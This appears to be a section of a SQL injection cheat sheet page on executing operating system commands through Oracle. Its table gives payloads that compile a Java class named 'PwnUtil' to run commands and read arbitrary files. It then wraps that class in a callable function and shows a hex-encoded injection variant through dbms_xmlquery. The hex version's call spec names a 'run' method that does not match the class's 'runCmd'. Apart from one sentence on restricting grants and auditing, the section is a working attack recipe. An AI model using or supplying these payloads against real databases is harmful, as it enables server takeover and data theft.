<h3 id="executing-os-commands">Executing OS Commands Through Oracle</h3>
<p class="pageDescription">{{site.data.injectionDescriptions.executingOSCommands}}</p>
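<p><a target="_blank" rel="noopener" href="http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql">Java</a> stored procedures can be used to execute OS commands if the Oracle JVM is installed in the database. The technique also depends on the injected session's account being able to create Java source and holding the Java permissions needed to execute programs, so keeping those grants off application accounts and auditing for newly created Java sources and call-spec functions limits and detects it.</p>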
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th>Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>Creating Java Classes</td>
<td>
/* create Java class */<br/> BEGIN
<br/> EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String
stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new
FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';<br/> END;
<br/> /
<br/><br/> BEGIN
<br/> EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';<br/> END;
<br/> /
<br/><br/> /* run OS command */<br/> SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;</td>
</tr>
<tr>
<td>Creating Java Classes (Hex encoded)</td>
<td>
/* create Java class */<br/> SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''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''));
<br/>EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b''));
end;')) results FROM dual
<br/><br/> /* run OS command */<br/> SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
</td>
</tr>
</tbody>
</table>